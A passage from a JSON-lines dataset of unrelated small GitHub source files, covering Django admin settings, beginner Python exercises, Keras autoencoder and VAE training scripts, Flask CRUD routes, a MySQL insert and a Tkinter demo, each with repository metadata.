\"is_staff\",\n \"is_superuser\",\n \"groups\",\n \"user_permissions\",\n )\n },\n ),\n (_(\"Important dates\"), {\"fields\": (\"last_login\", \"date_joined\")}),\n )\n add_fieldsets = (\n (\n None,\n {\n \"classes\": (\"wide\",),\n \"fields\": (\n \"first_name\",\n \"last_name\",\n \"is_staff\",\n \"password1\",\n \"password2\",\n ),\n },\n ),\n )\n\n list_display = (\"first_name\", \"last_name\", \"email\", \"is_verified\")\n search_fields = (\"id\", \"first_name\", \"last_name\", \"email\")\n ordering = (\"id\",)\n list_filter = (\n \"is_staff\",\n \"is_verified\",\n )\n","repo_name":"piotr-grzelka/uptime-monitor","sub_path":"backend/apps/accounts/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18240294655","text":"import random\nmin= int(input(\"enter minumum num :\"))\nmax = int(input('enter maximum number :'))\ntarget_number = (int(input(\"enter your guessing number :\")))\nreward = 0\nguess = random.randint(min,max)\nif target_number == guess:\n print('congratulations your guessing number is right')\n reward +=1\nelse:\n print(\"no thats not a right number\")\n reward -=1\nreward = reward\nprint( 'reward = ' , reward)\n","repo_name":"vikasgpt153/number-guessing-game","sub_path":"numbergame.py","file_name":"numbergame.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"71328243418","text":"# Inicialize o gabarito da prova\r\ngabarito = [\"A\", \"B\", \"C\", \"D\", \"E\", \"E\", \"D\", \"C\", \"B\", \"A\"]\r\n\r\n# Inicialize variáveis para estatísticas\r\nmaior_acerto = 0\r\nmenor_acerto = 10\r\ntotal_alunos = 0\r\nsoma_notas = 0\r\n\r\nwhile True:\r\n # Solicite ao aluno que insira as respostas\r\n respostas_aluno = []\r\n for i in range(1, 11):\r\n resposta = input(f\"Resposta da questão {i}: \").upper() # Converta para maiúsculas\r\n respostas_aluno.append(resposta)\r\n\r\n # Compare as respostas com o gabarito e calcule o total de acertos\r\n total_acertos = sum(1 for a, b in zip(respostas_aluno, gabarito) if a == b)\r\n\r\n # Calcule a nota (1 ponto por resposta certa)\r\n nota = total_acertos\r\n\r\n # Atualize as estatísticas\r\n total_alunos += 1\r\n soma_notas += nota\r\n if total_acertos > maior_acerto:\r\n maior_acerto = total_acertos\r\n if total_acertos < menor_acerto:\r\n menor_acerto = total_acertos\r\n\r\n # Imprima a nota do aluno\r\n print(f\"Total de acertos: {total_acertos}\")\r\n print(f\"Nota: {nota}\")\r\n\r\n # Pergunte se outro aluno vai utilizar o sistema\r\n continuar = input(\"Outro aluno vai utilizar o sistema? (S para sim, qualquer outra tecla para encerrar): \").upper()\r\n if continuar != \"S\":\r\n break\r\n\r\n# Calcule a média das notas da turma\r\nmedia_notas = soma_notas / total_alunos\r\n\r\n# Imprima as estatísticas finais\r\nprint(\"Estatísticas finais:\")\r\nprint(f\"Maior acerto: {maior_acerto}\")\r\nprint(f\"Menor acerto: {menor_acerto}\")\r\nprint(f\"Total de alunos: {total_alunos}\")\r\nprint(f\"Média das notas da turma: {media_notas:.2f}\")\r\n","repo_name":"erikmarquesbenetti07/Estruturas_De_Repeticao_Com_Python","sub_path":"45.py","file_name":"45.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"36970132501","text":"import numpy as np\nfrom keras.layers import Input, Dense\nfrom keras.models import Model\nimport tensorflow\nimport keras\nimport os\n\n# set the random seed for numpy and tensorflow backend\n# to have a more consistent testing environment\ndef seedy(s):\n np.random.seed(s)\n tensorflow.random.set_seed(s)\n\n# encoding dimension is the size of the compressed layer\nclass AutoEncoder:\n def __init__(self, encoding_dim=3):\n self.encoding_dim = encoding_dim\n r = lambda: np.random.randint(1, 3)\n self.x = np.array([[r(), r(), r()] for _ in range(1000)])\n print(self.x)\n \n def _encoder(self):\n inputs = Input(shape=(self.x[0].shape))\n encoded = Dense(self.encoding_dim, activation='relu')(inputs)\n model = Model(inputs=inputs, outputs=encoded)\n self.encoder = model\n return model\n \n def _decoder(self):\n inputs = Input(shape=(self.encoding_dim,))\n decoded = Dense(3)(inputs)\n model = Model(inputs, decoded)\n self.decoder = model\n return model\n \n def encoder_decoder(self):\n ec = self._encoder()\n dc = self._decoder()\n\n inputs = Input(shape=self.x[0].shape)\n ec_out = ec(inputs)\n dc_out = dc(ec_out)\n model = Model(inputs, dc_out)\n\n self.model = model\n return model\n\n def fit(self, batch_size=10, epochs=300):\n self.model.compile(optimizer='sgd', loss='mse')\n log_dir = './log/'\n tbCallBack = keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=0, write_graph=True, write_images=True)\n self.model.fit(self.x, self.x,\n epochs=epochs,\n batch_size=batch_size,\n callbacks=[tbCallBack])\n \n def save(self):\n if not os.path.exists(r'./weights'):\n os.mkdir(r'./weights')\n else:\n self.encoder.save(r'./weights/encoder_weights.h5')\n self.decoder.save(r'./weights/decoder_weights.h5')\n self.model.save(r'./weights/ae_weights.h5')\n\nif __name__ == '__main__':\n seedy(2)\n ae = AutoEncoder(encoding_dim=2)\n ae.encoder_decoder()\n ae.fit(batch_size=50, epochs=300)\n ae.save()","repo_name":"anhdungle93/autoencoder_in_keras","sub_path":"autoencoder.py","file_name":"autoencoder.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73303536535","text":"from app import app, db\nfrom flask import jsonify, request\nfrom app.models import CarAccounting, CarAccountingSchema\nfrom datetime import datetime\n\n@app.route('/car-account', methods = ['GET'])\ndef get_car_account():\n car_account_schema = CarAccountingSchema(many = True)\n\n req = CarAccounting.query.all()\n\n output = car_account_schema.dump(req)\n return jsonify(output)\n\n@app.route('/car-account', methods = ['POST'])\ndef post_car_account():\n data = request.get_json()\n car_id = data['car_id']\n policeman_id = data['policeman_id']\n\n car_account = CarAccounting(car_id = car_id, policeman_id = policeman_id)\n \n db.session.add(car_account)\n db.session.commit()\n\n return {\"message\": \"Success\"}\n\n@app.route('/car-account/', methods = ['GET'])\ndef get_cur_car_account(id):\n car_account_schema = CarAccountingSchema(many = False)\n\n req = CarAccounting.query.filter_by(id = id).first()\n\n output = car_account_schema.dump(req)\n return jsonify(output)\n\n\n@app.route('/car-account/', methods = ['POST'])\ndef edit_cur_car_account(id):\n data = request.get_json()\n car_id = data['car_id']\n policeman_id = data['policeman_id']\n\n car_account = CarAccounting.query.filter_by(id = id).first()\n car_account.car_id = car_id\n car_account.policeman_id = policeman_id\n\n db.session.commit()\n\n return {\"message\": \"Success\"}\n\n@app.route('/car-account/', methods = ['DELETE'])\ndef delete_cur_car_account(id):\n car_account = CarAccounting.query.filter_by(id = id).first()\n\n db.session.delete(car_account)\n db.session.commit()\n \n return {\"message\": \"Success\"}\n\n@app.route('/car-account//policeman', methods = ['DELETE'])\ndef delete_cur_car_account_by_policeman_id(id):\n car_account = CarAccounting.query.filter_by(policeman_id = id).first()\n\n db.session.delete(car_account)\n db.session.commit()\n \n return {\"message\": \"Success\"}\n","repo_name":"Talich12/BackendPoliceStation","sub_path":"app/routes/car_accounting.py","file_name":"car_accounting.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"27662622160","text":"'''\nThis file is used to train the shape autoencoder model.\n\nIt uses cvae.py as the base model and many data functions from utils to make it simpler.\n\nIt also has various methods for exploring a trained model to see how well it can reconstruct models and\ninterpolate between various reconstructions.\n\nAt the end there is a method called 'journey' which extends on the idea of interpolating between 2 chosen models\nand chooses the models automatically on repeat to create cool interpolation animations.\n'''\n#\n\n#%% Imports\nimport numpy as np\nimport os\nfrom shutil import copyfile\nimport subprocess\nfrom sys import getsizeof, stdout\nfrom scipy import spatial\n\nimport time\nimport json\nimport pandas as pd\nimport random\nimport inspect\n\nimport pickle\nfrom tqdm import tqdm\nimport glob\n\nimport cvae as cv\nimport utils as ut\nimport logger\nimport configs as cf\n\nimport tensorflow as tf\n\nAUTOTUNE = tf.data.experimental.AUTOTUNE\n\nJUPYTER_NOTEBOOK = True\n\n# if JUPYTER_NOTEBOOK:\n# %reload_ext autoreload\n# %autoreload 2\n\n#%% Setup\n#######\ncf_img_size = cf.IMG_SIZE\ncf_latent_dim = cf.LATENT_DIM\ncf_batch_size = cf.BATCH_SIZE #32\ncf_learning_rate = cf.IMGRUN_LR #4e-4\ncf_limits = [cf_img_size, cf_img_size]\n#( *-*) ( *-*)>⌐■-■ ( ⌐■-■)\n#\ncf_kl_weight = cf.KL_WEIGHT\ncf_num_epochs = cf.N_IMGRUN_EPOCH\n#dfmeta = ut.read_meta()\ncf_val_frac = cf.VALIDATION_FRAC\n#%% are we GPU-ed?\ntf.config.experimental.list_physical_devices('GPU') \n\n\n#%% Define Training methods\n\n\ndef step_model(epochs, display_interval=-1, save_interval=10, test_interval=10,current_losses=([],[])) :\n \"\"\"\n custom training loops to enable dumping images of the progress\n \"\"\"\n\n model.training=False\n elbo_test,elbo_train = current_losses\n if len(elbo_test)>0:\n print(f\"test: n={len(elbo_test)}, last={elbo_test[-1]}\")\n print(f\"train: n={len(elbo_train)}, last={elbo_train[-1]}\")\n\n for epoch in range(1, epochs + 1):\n start_time = time.time()\n losses = []\n batch_index = 1\n\n # DO THE AUGMENTATION HERE...\n for train_x, label in train_dataset :\n neg_ll, kl_div = model.get_test_loss_parts(train_x)\n \n loss_batch = neg_ll+kl_div\n\n #neg_elbo = tf.math.reduce_mean(self.kl_weight *\n\n\n losses.append(loss_batch)\n stdout.write(\"\\r[{:3d}/{:3d}] \".format(batch_index, total_train_batchs))\n stdout.flush() \n\n batch_index = batch_index + 1\n\n ## TRAIN LOSS\n elbo = np.mean(losses)\n print(f'Epoch: {lg.total_epochs} Train loss: {float(elbo):.1f} Epoch Time: {float(time.time()-start_time):.2f}')\n lg.log_metric(elbo, 'train loss',test=False)\n elbo_train.append(elbo)\n\n if ((display_interval > 0) & (epoch % display_interval == 0)) :\n if epoch == 1:\n ut.show_reconstruct(model, test_samples, title=lg.total_epochs, index=sample_index, show_original=True, save_fig=True, limits=cf_limits) \n else:\n ut.show_reconstruct(model, test_samples, title=lg.total_epochs, index=sample_index, show_original=False, save_fig=True, limits=cf_limits)\n\n ## TEST LOSSin chekmakedirs\n test_losses = []\n for test_x, test_label in test_dataset: # (dataset.take(batches).shuffle(100) if batches > 0 else dataset.shuffle(100)) :\n #test_x = tf.cast(test_x, dtype=tf.float32) #might not need this\n test_cost_batch = model.compute_test_loss(test_x) # this should turn off the dropout...\n test_losses.append(test_cost_batch)\n\n test_loss = np.mean(test_losses)\n print(f' TEST LOSS : {test_loss:.1f} for epoch: {lg.total_epochs}')\n lg.log_metric(test_loss, 'test loss',test=True)\n elbo_test.append(test_loss)\n\n ## SAVE\n if epoch % save_interval == 0:\n lg.save_checkpoint()\n\n lg.increment_epoch()\n if (ut.check_stop_signal(dir_path=cf.IMGRUN_DIR)) :\n print(f\"stoping at epoch = {epoch}\")\n break\n else:\n print(f\"executed {epoch} epochs\")\n \n out_losses = (elbo_train,elbo_test)\n return epoch, out_losses #(loss_batch2,loss_batchN)\n\n\n\n\n\ndef train_model(epochs, display_interval=-1, save_interval=10, test_interval=10,current_losses=([],[])) :\n \"\"\"\n custom training loops to enable dumping images of the progress\n \"\"\"\n print('\\n\\nStarting training...\\n')\n model.training=True\n elbo_train,elbo_test = current_losses\n if len(elbo_test)>0:\n print(f\"test: n={len(elbo_test)}, last={elbo_test[-1]}\")\n print(f\"train: n={len(elbo_train)}, last={elbo_train[-1]}\")\n\n for epoch in range(1, epochs + 1):\n start_time = time.time()\n losses = []\n batch_index = 1\n\n # DO THE AUGMENTATION HERE...\n for train_x, _ in train_dataset :\n #for train_x, label in train_dataset :\n #train_x = tf.cast(train_x, dtype=tf.float32)\n loss_batch = model.trainStep(train_x)\n losses.append(loss_batch)\n stdout.write(\"\\r[{:3d}/{:3d}] \".format(batch_index, total_train_batchs))\n stdout.flush() \n\n batch_index = batch_index + 1\n\n ## TRAIN LOSS\n elbo = np.mean(losses)\n print(f'Epoch: {lg.total_epochs} Train loss: {float(elbo):.1f} Epoch Time: {float(time.time()-start_time):.2f}')\n lg.log_metric(elbo, 'train loss',test=False)\n elbo_train.append(elbo)\n\n if ((display_interval > 0) & (epoch % display_interval == 0)) :\n if epoch == 1:\n ut.show_reconstruct(model, test_samples, title=lg.total_epochs, index=sample_index, show_original=True, save_fig=True, limits=cf_limits) \n else:\n ut.show_reconstruct(model, test_samples, title=lg.total_epochs, index=sample_index, show_original=False, save_fig=True, limits=cf_limits)\n\n ## TEST LOSSin chekmakedirs\n if epoch % test_interval == 0:\n test_losses = []\n for test_x, test_label in test_dataset: # (dataset.take(batches).shuffle(100) if batches > 0 else dataset.shuffle(100)) :\n #test_x = tf.cast(test_x, dtype=tf.float32) #might not need this\n test_cost_batch = model.compute_test_loss(test_x) # this should turn off the dropout...\n test_losses.append(test_cost_batch)\n\n test_loss = np.mean(test_losses)\n print(f' TEST LOSS : {test_loss:.1f} for epoch: {lg.total_epochs}')\n lg.log_metric(test_loss, 'test loss',test=True)\n elbo_test.append(test_loss)\n\n ## SAVE\n if epoch % save_interval == 0:\n lg.save_checkpoint()\n\n lg.increment_epoch()\n if (ut.check_stop_signal(dir_path=cf.IMGRUN_DIR)) :\n print(f\"stoping at epoch = {epoch}\")\n break\n else:\n print(f\"executed {epoch} epochs\")\n \n out_losses = (elbo_train,elbo_test)\n return epoch, out_losses #(loss_batch2,loss_batchN)\n\n\n\n#%% #################################################\n##\n## LOAD/PREP data\n## - l if we've already been through this for the current database we'll load... otherwise process.\n#####################################################\n\n\n\ndata_from_scratch = not ut.check_for_datafiles(cf.DATA_DIR,['train_data.npy','val_data.npy','all_data.npy'])\n#data_from_scratch = True\nrandom.seed(488)\ntf.random.set_seed(488)\n\nif data_from_scratch:\n #create\n files = glob.glob(os.path.join(cf.IMAGE_FILEPATH, \"*/img/*\"))\n files = np.asarray(files)\n train_data, val_data, all_data = ut.split_shuffle_data(files,cf_val_frac)\n # Save base train data to file \n np.save(os.path.join(cf.DATA_DIR, 'train_data.npy'), train_data, allow_pickle=True)\n np.save(os.path.join(cf.DATA_DIR, 'val_data.npy'), val_data, allow_pickle=True)\n np.save(os.path.join(cf.DATA_DIR, 'all_data.npy'), all_data, allow_pickle=True)\nelse:\n #load\n print(f\"loading train/validate data from {cf.DATA_DIR}\")\n train_data = np.load(os.path.join(cf.DATA_DIR, 'train_data.npy'), allow_pickle=True)\n val_data = np.load(os.path.join(cf.DATA_DIR, 'val_data.npy'), allow_pickle=True)\n all_data = np.load(os.path.join(cf.DATA_DIR, 'all_data.npy'), allow_pickle=True)\n\n\n#%% #################################################\n##\n## Set up the model \n## - load current state or\n## - train from scratch\n#####################################################\n\nmodel = cv.CVAE(cf_latent_dim, cf_img_size, learning_rate=cf_learning_rate, kl_weight=cf_kl_weight, training=True)\n### instance of model used in GOAT blog\n#model = cv.CVAE_EF(cf_latent_dim, cf_img_size, cf_learning_rate, training=True)\n\nmodel.print_model_summary()\nmodel.print_model_IO()\n\nif JUPYTER_NOTEBOOK:\n tf.keras.utils.plot_model(model.enc_model, show_shapes=True, show_layer_names=True)\n tf.keras.utils.plot_model(model.gen_model, show_shapes=True, show_layer_names=True)\n\n\n#%% Setup logger info\ntrain_from_scratch = ( cf.CURR_IMGRUN_ID is None )\n\nif train_from_scratch:\n lg = logger.logger(trainMode=True, txtMode=False)\n lg.setup_checkpoint(encoder=model.enc_model, generator=model.gen_model, opt=model.optimizer) # sets up the writer\n #lg.restore_checkpoint() \n lg.check_make_dirs() # makes all the direcotries\n # copy to the current run train data to file\n np.save(os.path.join(lg.saved_data, 'train_data.npy'), train_data, allow_pickle=True)\n np.save(os.path.join(lg.saved_data, 'val_data.npy'), val_data, allow_pickle=True)\n np.save(os.path.join(lg.saved_data, 'all_data.npy'), all_data, allow_pickle=True)\n total_epochs = 0\n curr_losses = ([],[])\nelse:\n root_dir = os.path.join(cf.IMGRUN_DIR, cf.CURR_IMGRUN_ID)\n lg = logger.logger(root_dir=root_dir, trainMode=True, txtMode=False)\n lg.setup_checkpoint(encoder=model.enc_model, generator=model.gen_model, opt=model.optimizer) # sets up the writer\n lg.restore_checkpoint() # actuall reads in the weights...\n allfiles = os.listdir(lg.saved_data)\n print(f\"allfiles: {allfiles}\")\n total_epochs = [int(f.rstrip(\".pkl\").lstrip(\"losses_\")) for f in allfiles if f.startswith(\"losses_\")]\n total_epochs.sort(reverse=True)\n print(f\"total_epochs = {total_epochs[0]}\")\n total_epochs = total_epochs[0]\n curr_losses = ut.load_pickle(os.path.join(lg.saved_data, f\"losses_{total_epochs}.pkl\"))\n\n\n\n#%% # LOAD & PREPROCESS the from list of filessudo apt install gnome-tweak-tool\n# could simplify this by making another \"load_prep_batch_data(train_data,imagesize,augment=True,)\"\ntrain_dataset = ut.load_prep_and_batch_data(train_data, cf_img_size, cf_batch_size, augment=True)\ntest_dataset = ut.load_prep_and_batch_data( val_data, cf_img_size, cf_batch_size, augment=False)\n\n# train_dataset = tf.data.Dataset.from_tensor_slices(train_data)\n# test_dataset = tf.data.Dataset.from_tensor_slices(val_data)\n# train_dataset = ut.load_and_prep_data(cf_img_size, train_dataset, augment=True)\n# test_dataset = ut.load_and_prep_data(cf_img_size, test_dataset, augment=False)\n# train_dataset = ut.batch_data(train_dataset)\n# test_dataset = ut.batch_data(test_dataset)\n\n#%% Load all data\n# get some samples\nfor train_samples, train_labels in train_dataset.take(1) : pass\nfor test_samples, test_labels in test_dataset.take(1) : pass\n\n# count number of batches... \ntotal_train_batchs = 0\nfor _ in train_dataset :\n total_train_batchs += 1\n\n# #%% Setup datasets\nsample_index = 1\n\n\n#%% lets pick apart our loss/cost\n# we already have our samples\n# train_samples, train_labels in train_dataset.take(1) : pass\n# test_samples, test_labels in test_dataset.take(1) : pass\n\n\n#%%\n\n \n\n\n\n\n\n#%% Training & Validation data save?\n# do we want to save the image data for the training set... i.e. the augmented bytes?\ndump_image_data = False\nif dump_image_data:\n\n start_time = time.time()\n batch_index = 1\n imgs = []\n labels = []\n\n for train_x, label in train_dataset :\n #train_x = tf.cast(train_x, dtype=tf.float32)\n #imgs.append(np.moveaxis(train_x.numpy(),0,-1)) # put the \"batch\" at the end so we can stack\n imgs.append(train_x.numpy()) # put the \"batch\" at the end so we can stack\n labs = [l.numpy().decode() for l in label]# decode makes this a simple string??\n labels.extend(labs)\n stdout.write(\"\\r[{:3d}/{:3d}] \".format(batch_index, total_train_batchs))\n stdout.flush()\n batch_index = batch_index + 1\n\n trainimgs = np.concatenate(imgs,axis=0)\n trainlabs = labels # np.stack(labels)\n False\n print('Epoch Time: {:.2f}'.format( float(time.time() - start_time)))\n\n ut.dump_pickle(os.path.join(lg.saved_data,\"train_agumented.pkl\"), (trainimgs,trainlabs) )\n\n # validation data save \n batch_index = 1\n imgs = []\n labels = []\n for test_x, label in test_dataset :\n imgs.append(train_x.numpy()) # put the \"batch\" at the end so we can stack\n labs = [l.numpy().decode() for l in label] # decode makes this a simple string??\n labels.extend(labs)\n\n stdout.write(\"\\r[{:3d}/{:3d}] \".format(batch_index, 16))\n stdout.flush()\n batch_index = batch_index + 1\n\n flatten = lambda l: [item for sublist in l for item in sublist]\n\n testlabs = labels # np.stack(labels)\n testimgs = np.concatenate(imgs,axis=0)\n print('Epoch Time: {:.2f}'.format( float(time.time() - start_time)))\n\n ut.dump_pickle(os.path.join(lg.saved_data,\"test.pkl\"), (testimgs,testlabs) )\n\n\n#%% \n# #################################################\n##\n## log the run and TRAIN!!\n## - train from scratch OR \n## - start where we left off\n##\n#####################################################\n\ncf_root_dir = lg.root_dir #make sure we log this\n# log Config...\nlg.write_config(locals(), [cv.CVAE, cv.CVAE.__init__])\nlg.update_plot_dir()\n#tf.config.experimental.list_physical_devices('GPU') \n\n\n\n\n#%% \nn_epochs = cf_num_epochs\nepoch_n, curr_losses = train_model(n_epochs, display_interval=5, save_interval=20, test_interval=5,current_losses=curr_losses)\n#epoch_n,elbo_train,elbo_test = trainModel(n_epochs, display_interval=5, save_interval=5, test_interval=5)\ntotal_epochs += epoch_n\nif lg.total_epochs == total_epochs:\n print(f\"sanity epoch={total_epochs}\")\nelse:\n lg.reset(total_epochs=total_epochs)\nmodel.save_model(lg.root_dir, lg.total_epochs )\n\nut.dump_pickle(os.path.join(lg.saved_data, f\"losses_{total_epochs}.pkl\"),curr_losses)\n\n\n\nfor test_samples, test_labels in test_dataset.take(1) : pass\nfor train_samples, train_labels in train_dataset.take(1) : pass\n\n#%% \nsample_index = 1\n\nfor sample_index in range(10):\n title_text = f\"trained n={sample_index}\"\n ut.show_reconstruct(model, train_samples, title=title_text, index=sample_index, show_original=True, save_fig=True, limits=cf_limits)\n\nfor sample_index in range(10):\n title_text = f\"tested n={sample_index}\"\n ut.show_reconstruct(model, test_samples, title=title_text, index=sample_index, show_original=True, save_fig=True, limits=cf_limits)\n\n###########################\n############################\n#\n# Now make some easy access databases...\n#\n############################\n###########################\n#%% \n\n# ut.make_gif_from_dir(gif_in_dir, name):\n\n# model.save_model(lg.root_dir, 138)\n# #%% \n\n# model.load_model(lg.root_dir,669)\n# # Need to make methods to extract the pictures \n\n#%% Run model on all data to get latent vects and loss. Used for streamlit app and other places.\n#preds,losses = ut.dumpReconstruct( model, train_dataset, test_dataset )\nds = ut.load_and_dump(cf_img_size, lg.img_in_dir)\n#or _samples, _labels in ds.take(1) : pass\n# remake this to simply go through all the data and calculate the embedding and loss... new functions probably...\n#%%count our n\nn_samples = 0\nfor _ in ds :\n n_samples += 1\n#%% dump the vectors to a dictionary\n\nsnk2loss = {}\nsnk2vec = {}\nfor sample, label in tqdm(ds, \n unit_scale=True, \n desc=\"Saving shape 2 vec: \", \n unit=\" encodes\", \n total=n_samples ) :\n #sample = tf.cast(sample, dtype=tf.float32)\n key = label.numpy() # maybe should have changed this to a string... but byte is good...\n snk2vec[key] = model.encode(sample[None,...], reparam=True).numpy()[0]\n snk2loss[key] = model.compute_loss(sample[None,...]).numpy()\n\nut.dump_pickle(os.path.join(lg.root_dir,\"snk2vec.pkl\"), snk2vec)\nut.dump_pickle(os.path.join(lg.root_dir,\"snk2loss.pkl\"), snk2loss)\n\n\n\n\n#################\n#################\n","repo_name":"ergonyc/SneakerGen","sub_path":"beta-vae/vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":16521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"320310893","text":"import mysql.connector\r\nimport csv\r\nfrom datetime import datetime \r\n\r\nmydb = mysql.connector.connect(\r\n host = \"localhost\",\r\n user = \"root\",\r\n password = \"\",\r\n database = \"absensi\",\r\n autocommit=True\r\n)\r\n\r\nmycursor = mydb.cursor()\r\n\r\nwith open('id-names.csv', 'r') as file:\r\n reader = csv.reader(file)\r\n next(reader)\r\n for row in reader:\r\n name = \"Raffa\"\r\n waktu = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n print(name)\r\n print(waktu)\r\n query = \"INSERT INTO absen (name, waktu) VALUES (%s, %s)\"\r\n values = (name, waktu)\r\n mycursor.execute(query, values)\r\n\r\nmydb.commit()\r\nmydb.close()\r\n\r\n\r\n","repo_name":"NekoMeong/Absensi","sub_path":"penyambung.py","file_name":"penyambung.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"71431670297","text":"from random import randint\nimport numpy as np\nimport objects\n\nclass horizontalbeams:\n def __init__(self,board):\n self.__character=\"-\"\n self.__x=randint(2,29)\n self.__y=randint(10,1300)\n self._placehorizontalbeam(board)\n\n def _placehorizontalbeam(self,board):\n flag=0\n for j in range(self.__y,self.__y+4):\n if board._matrix[self.__x][j]==\"$\" or board._matrix[self.__x][j]==\"|\":\n flag=1\n arr3=np.empty([1,4],dtype=object)\n if flag==0:\n arr3=objects.horizontal_beam\n board._matrix[self.__x:self.__x+1,self.__y:self.__y+4]=arr3","repo_name":"damasravani19/Jet-pack-joyride","sub_path":"horizontalbeams.py","file_name":"horizontalbeams.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"32185854400","text":"# 把一个字符串转换为Unicode码位的列表\nsymbols = \"@#$%^&\"\ncodes = []\n\nfor symbol in symbols:\n # ord返回一个单字��字符串的Unicode代码点。\n codes.append(ord(symbol))\n\nprint(codes)\n\n# 使用列表推导式\ncodes_2 = [ord(symbol) for symbol in symbols]\nprint(codes_2)\n\n# 使用filter和map组合\nsymbols_2 = \"$¥%*%@!#\"\nbeyond_ascii = list(filter(lambda c: c > 127, map(ord, symbols_2)))\nprint(beyond_ascii)\n","repo_name":"mgw2168/fluent_python","sub_path":"chapter02/01-listcomps.py","file_name":"01-listcomps.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"42533415528","text":"opcao = ' '\ncount = 0\nsoma = 0\nmaior = 0\nmenor = 0\nwhile opcao not in 'Nn':\n num = int(input('Digite um número: '))\n if count == 0:\n maior = num\n menor = num\n if maior < num:\n maior = num\n if menor > num:\n menor = num\n soma += num\n count += 1\n opcao = input('Deseja continuar [S/N]? ')\n\nmedia = soma / count\nprint('Você digitou {} números. A média dos valores digitados foi {}, '\n 'o menor valor {} e o maior valor {}.'.format(count, media, menor, maior))\n","repo_name":"fabriciolelis/python_studying","sub_path":"Curso em Video/ex065.py","file_name":"ex065.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"38810673487","text":"from sympy import symbols, Piecewise, integrate, oo, limit, pprint\nfrom sympy.plotting import plot\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport soundfile as sf\nfrom scipy.signal import fftconvolve\nfrom scipy.fftpack import fft, ifft\nfrom ejercicio_1 import funcion_a_trozos, grafico_funcion, energia_señal, potencia_señal\nfrom ejercicio_2 import aleatorios\nfrom ejercicio_3 import promedio_señal\nfrom ejercicio_4 import carga_lectura_wav, convolucion\n\ndef main():\n print(\"En el presente trabajo, presentamos las respuestas de los ejercicios solicitados:\\n\")\n print(f\"Ejercicio 1:\\n{'-'*30}\")\n \n x, T = symbols(\"x T\")\n\n funcion = funcion_a_trozos(x)\n grafico_funcion(funcion)\n energia = energia_señal(funcion, x)\n potencia = potencia_señal(funcion, x, T)\n print(\"La señal está caracterizada por: \")\n pprint(funcion)\n print(\n f\"\\nLa misma tiene una energía de valor {energia}\\nY una potencia igual a {potencia}\"\n )\n\n print('-'*30)\n\n print(f\"Ejercicio 2:\\n{'-'*30}\")\n print(\"Se mostrará un gráfico correspondiente a la consigna solicitada:\\n\")\n aleatorios(0, 10, 30)\n print('-'*30)\n\n print(f\"Ejercicio 3:\\n{'-'*30}\")\n nombre_archivo_ej3 = input(\"Ingrese el nombre del archivo de audio seguido de .wav para graficar su promedio: \")\n promedio_señal(nombre_archivo_ej3)\n print('-'*30)\n\n print(f\"Ejercicio 4:\\n{'-'*30}\")\n nombre_archivo_ej4_1 = input(\"Ingrese el nombre del primer archivo de audio seguido de .wav para convolucionar (o su ruta de acceso): \")\n nombre_archivo_ej4_2 = input(\"Ingrese el nombre del segundo archivo de audio seguido de .wav para convolucionar (o su ruta de acceso): \")\n data_1, fs_1 = carga_lectura_wav(nombre_archivo_ej4_1)\n data_2, fs_2 = carga_lectura_wav(nombre_archivo_ej4_2)\n convolucion_audios = convolucion(data_1, data_2)\n print('-'*30)\n\nif __name__ == '__main__':\n main()","repo_name":"maxiyommi/coding-challenge","sub_path":"benjamin_sardini/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"19218999922","text":"from tkinter import *\n\nwindow = Tk()\nwindow.title(\"My first GUI program\")\nwindow.minsize(width=500, height=300)\n\nmy_label = Label(text=\"I am a Label\", font=(\"Arial\", 24, \"bold\"))\n#pack() puts it in the centre of the screen\nmy_label.grid(column=0, row=0)\n\n#button\ndef button_clicked():\n my_label.config(text=input.get())\n\n\nbutton = Button(text=\"Click me\", command=button_clicked)\nbutton.grid(column=1, row=1)\n\n# Entry\ninput = Entry(width=10)\ninput.grid(column=3, row=2)\n\nnew_button = Button(text=\"click me\")\nnew_button.grid(column=2, row=0)\n\n\n\nwindow.mainloop()","repo_name":"adachoinw/python","sub_path":"day27/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"26494309432","text":"'''\nThe decimal number, 585 = 10010010012 (binary), is palindromic in both bases.\n\nFind the sum of all numbers, less than one million, which are palindromic in base 10 and base 2.\n\n(Please note that the palindromic number, in either base, may not include leading zeros.)\n'''\n\nimport time\n\ndef is_palin(n):\n return str(n) == str(n)[::-1]\n\n#driver code\nstart_time = time.time()\n\npalindromes = []\n\nfor i in range(1000000):\n if is_palin(i):\n if is_palin(bin(i)[2:]):\n palindromes.append(i)\n\nprint(sum(palindromes))\nprint('Runtime: {}'.format(time.time() - 